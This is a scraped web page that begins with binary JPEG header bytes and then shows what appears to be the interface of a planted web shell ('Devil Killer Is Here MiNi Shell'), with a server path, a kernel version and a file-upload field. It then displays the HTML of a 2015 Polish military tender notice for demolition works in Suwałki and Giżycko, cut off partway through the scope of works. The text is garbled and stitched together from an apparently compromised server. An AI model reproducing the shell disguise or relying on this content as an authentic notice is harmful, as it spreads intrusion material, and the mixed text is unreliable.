JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150828/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150828/127619-N-2015.html

<p class="kh_header"><b>Giżycko: ROBOTY ROZBIÓRKOWE NA TERENIE JW. 1747 
W SUWAŁKACH ORAZ NA TERENIE JW. 3797 	
W GIŻYCKU 
(Z PODZIAŁEM NA 2 ZADANIA)</b><br>
<b>Numer ogłoszenia: 127619 - 2015; data zamieszczenia: 28.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OBRONA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY ROZBIÓRKOWE NA TERENIE JW. 1747 
W SUWAŁKACH ORAZ NA TERENIE JW. 3797 	
W GIŻYCKU 
(Z PODZIAŁEM NA 2 ZADANIA).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: 
Roboty rozbiórkowe na terenie JW. 1747 w Suwałkach oraz na terenie JW. 3797
 w Giżycku z podziałem na 2 zadania:

Zadanie nr 1:
Rozbiórki  na terenie JW. 1747 Suwałki, ul. Wojska Polskiego 21, 16-400 Suwałki.

	Budowla nr: 107,108,109,110,111 - zbiornik do przechowywania mps 
Opis obiektu:
Podziemny zbiornik jednokomorowy, jednopłaszczowy wykonany w formie walca z blachy stalowej grubości 8 mm. Rok budowy 1979.  
Dane techniczne zbiornika:
- kubatura (pojemność)  25  m3,
- długość x średnica: 6000 x 2390 mm,
- ciężar 3388 kg
	Teren za bud. 55
Opis obiektu:
Elementy obiektu: mury z cegły, betonu oraz fundamenty z kamienia.
	Bud. 89 - inne budynki gospodarcze
Opis obiektu:
Budynek  wybudowany został w 1901 roku, parterowy, ściany nadziemia budynku murowane z cegły, konstrukcja dachu drewniana  pokryta blachą. 
Dane techniczne budynku nr 89:
- kubatura budynku 319 m3;
- powierzchnia użytkowa 92 m2;
- długość x szerokość x wysokość:15,50x6,70x 4,10m  
	Ogrodzenie wewnętrzne
Opis obiektu.
Ogrodzenie z siatki wysokości 2 m na słupkach żelbetowych prefabrykowanych. 

Zadanie nr 2:
Rozbiórka budynków nr 13, 25, 32 i 33 JW. 3797 al. 1 Maja oraz ul. Mazurska w Giżycku

	Opis budynku nr 13 JW. 3797 w Giżycku
Budynek wolnostojący murowany. Dach o konstrukcji drewnianej pokryty papą. Budynek wyposażony w instalację elektryczną.  

Dane charakterystyczne budynku:
- rok budowy				- 1936
- powierzchnia zabudowy		-  67,65m2
- powierzchnia użytkowa		-  44,0m2


	Opis budynku nr 25 JW. 3797 w Giżycku
Budynek wolnostojący murowany. Dach o konstrukcji żelbetowej pokryty papą. Budynek wyposażony w instalację elektryczną.  

Dane charakterystyczne budynku:
- rok budowy				-1968
- powierzchnia zabudowy		-  18,62m2
- powierzchnia użytkowa		-  13,0m2

	Opis budynku nr 32 JW. 3797 w Giżycku
Budynek wolnostojący murowany. Dach o konstrukcji żelbetowej pokryty papą. Budynek wyposażony w instalację elektryczną, wodociągową, centralnego ogrzewania i kanalizację sanitarną.  

Dane charakterystyczne budynku:
- rok budowy				- 1974
- powierzchnia zabudowy		-  110,88m2
- powierzchnia użytkowa		-  81,0m2

	Opis budynku nr 33 JW. 3797 w Giżycku
Budynek wolnostojący, ściany fundamentowe murowane, konstrukcja ścian i dachu drewniana. Dach pokryty papą. Budynek wyposażony w instalację elektryczną, wodociągową, centralnego ogrzewania i kanalizację sanitarną.  

Dane charakterystyczne budynku:
- rok budowy				- 1976
- powierzchnia zabudowy		-  454,72m2
- powierzchnia użytkowa		-  386,0m2.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.11.13.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy.
Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości:
Zadanie nr 1 -  2 500,00 zł. (słownie: dwa tysiące pięćset złotych).
Zadanie nr 2 -  2 500,00 zł. (słownie: dwa tysiące pięćset złotych).
Prawidłowo złożone wadium wnosi się przed upływem terminu składania ofert tj. do dnia 15.09.2015r. r. do godz.: 08.00. 
Za skutecznie wniesione wadium w pieniądzu zamawiający uważa wadium, które w oznaczonym wyżej terminie znajdzie się na koncie Zamawiającego (widnieje jako zaksięgowane).Wadium może być wnoszone w jednej lub w kilku następujących formach: pieniądzu,poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych,gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego prowadzony przez: NBP O/O Olsztyn 51 1010 1397 0020 1713 9120 1000 z dopiskiem wadium w post. nr 73/2015 - roboty rozbiórkowe na terenie JW. .. w ..Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. 
W przypadku składania oferty wspólnej, wadium wniesione przez jednego z Wykonawców uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu znajdowania się 
w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany na każdej stronie
 wg wzoru Zamawiającego (załącznik nr 1 do SIWZ).
DOWÓD WNIESIENIA WADIUM
PEŁNOMOCNICTWO 
W przypadku podpisania oferty lub załączonego do niej jakiegokolwiek dokumentu i oświadczenia przez osobę nieuprawnioną do reprezentacji wprost z postanowień KRS lub CEIDG (Centralna Ewidencja i Informacja 
o Działalności Gospodarczej) należy dołączyć pełnomocnictwo, sporządzone zgodnie z wymaganiami Kodeksu Cywilnego - oryginał lub notarialnie potwierdzoną kopię dokumentu. 
- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy pzp)
W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia - pisemne (w oryginale) zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. UWAGA: w treści takiego zobowiązania winien znaleźć się zapis, że Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, jest świadomy tego, ze odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za udostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy 
z zastrzeżeniem § 11 umowy.
Zamawiający dopuszcza  zmianę terminu zakończenia robót w przypadku:
wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego,
klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia,
wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy, 
Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w § 5 ust. 1 umowy w przypadku zmiany stawki podatku od towarów i usług w 2015r.
Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.24wog.wp.mil.pl., http://www.bip.mon.gov.pl,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4352
ul. Nowowiejska 20
11-500 Giżycko
budynek sztabu - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2015 godzina 08:00, miejsce: Jednostka Wojskowa Nr 4352
ul. Nowowiejska 20
11-500 Giżycko
budynek sztabu - Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbiórki  na terenie JW. 1747 Suwałki, 
ul. Wojska Polskiego 21, 16-400 Suwałki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólny zakres prac do zadania nr 1: 
1.1. Budowla nr: 107,108,109,110,111 - zbiornik do przechowywania mps (produktów naftowych) . Demontaż- wydołowanie 5 szt. zbiorników:
1.1.1.Rozebranie chodników, obrzeży .
1.1.2. Rozebranie elementów betonowych.
1.1.3.Odkopanie zbiorników.
1.1.4.Wydobycie dźwigiem zbiornika na powierzchnię.
1.1.5.Wywóz i utylizacja zbiornika uzyskanego z demontażu.
1.1.6.Uzupełnienie i zasypanie wykopów  piaskiem.
1.2.Teren za bud. 55
1.2.1.Rozebranie fundamentu z kamienia.
1.2.2.Rozebranie murów z cegły.
1.2.3.Wywóz i utylizację gruzu rozbiórkowego.
1.2.4.Uzupełnienie i zasypanie wykopów piaskiem.
1.2.5.Rozrzucenie mieszanki torfu wraz z zasianiem trawy.
1.3.Bud.89 - inne budynki gospodarcze. Rozbiórka budynku.
1.3.1.Rozbiórka istniejącego pokrycia dachowego z blachy.
1.3.2.Rozebranie drewnianej konstrukcji więźby dachowej.
1.3.3.Rozebranie ścian  murowanych z  cegły.
1.3.4.Rozebranie fundamentu z kamienia polnego.
1.3.5.Wywóz i utylizację gruzu rozbiórkowego.
1.4.Ogrodzenie wewnętrzne - rozbiórka 162m.
1.4.1.Rozbiórka ogrodzenia z siatki wysokości 2 m na słupkach żelbetowych prefabrykowanych.
1.4.2.Przecinanie poprzeczne słupków bram ogrodzenia.
1.4.3.Wywóz i utylizację gruzu rozbiórkowego.
Szczegółowy zakres robót ujęty jest w przedmiarze robót i Specyfikacji Technicznej Wykonania i Odbioru Robót. Dokumenty te są zasadniczym źródłem do szacowania kosztów realizacyjnych przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.11.13.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozbiórka budynków nr 13, 25, 32 i 33 JW. 3797 al. 1 Maja oraz ul. Mazurska w Giżycku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.Ogólny zakres prac do zadania nr 2: 
2.1. Budynek nr 13
2.1.1.Rozebranie ścian z cegły.
2.1.2.Rozebranie ścianek działowych z cegieł.
2.1.3.Rozebranie betonowych i żelbetowych ław i stóp fundamentowych o grubości do 70cm.
2.1.4.Rozebranie posadzki i podłoża betonowego gr.15cm.
2.1.5.Rozebranie pokrycia dachu z papy.
2.1.6.Rozebranie konstrukcji więźby dachowej.
2.1.7.Rozebranie ścian studzienki murowych z cegły.
2.1.8.Demontaż ścian i płyty nadstudziennej z betonu.
2.1.9.Skucie betonowej opaski budynku.
2.1.10.Rozebranie betonowej opaski wokół budynku.
2.1.11.Zasypanie wykopu spycharkami.
2.1.12.Zakup i dowóz ziemi do zasypania wykopów, wyrównania terenu i wykonania trawników.
2.1.13.Wykonanie trawników poprzez: rozrzucenie i wyrównanie nawierzchni dowiezionej ziemi, wysiew nasion oraz ubicie nawierzchni trawników.
2.1.14.Demontaż rozdzielni lub skrzynek o wadze do 20kg.
2.1.15.Montaż wolnostojącego złącza kablowego ZK-2a i podstawy PBD.
2.1.16.Załadunek, wywóz oraz utylizacji gruzu spryzmowanego.
2.2.Budynek nr 25
2.2.1.Rozebranie ścian z cegły.
2.2.2.Rozebranie ścianek działowych z cegieł.
2.2.3.Rozebranie betonowych i żelbetowych ław i stóp fundamentowych o grubości do 70cm.
2.2.4.Rozebranie stropu żelbetowego gr.20cm.
2.2.5.Rozebranie posadzki i podłoża betonowego gr.15cm.
2.2.6.Rozebranie pokrycia dachu z papy.
2.2.7.Rozebranie obróbek blacharskich oraz parapetów zewnętrznych z blachy ocynkowanej nie nadającej się do użytku.
2.2.8.Rozebranie rur spustowych z blachy ocynkowanej nie nadającej się do użytku.
2.2.9.Rozebranie rynien dachowych z blachy ocynkowanej nie nadającej się do użytku.
2.2.10.Wykucie drzwi i ościeżnic stalowych o pow. do 2m2.
2.2.11.Wykucie drzwi dwuskrzydłowych i ościeżnic stalowych o pow. ponad 2m2.
2.2.12.Zasypanie wykopu spycharkami.
2.2.13.Zakup i dowóz ziemi do zasypania wykopów, wyrównania terenu i wykonania trawników.
2.2.14.Wykonanie trawników poprzez: rozrzucenie i wyrównanie nawierzchni dowiezionej ziemi, wysiew nasion oraz ubicie nawierzchni trawników.
2.2.15.Demontaż rozdzielni lub skrzynek o wadze do 50kg.
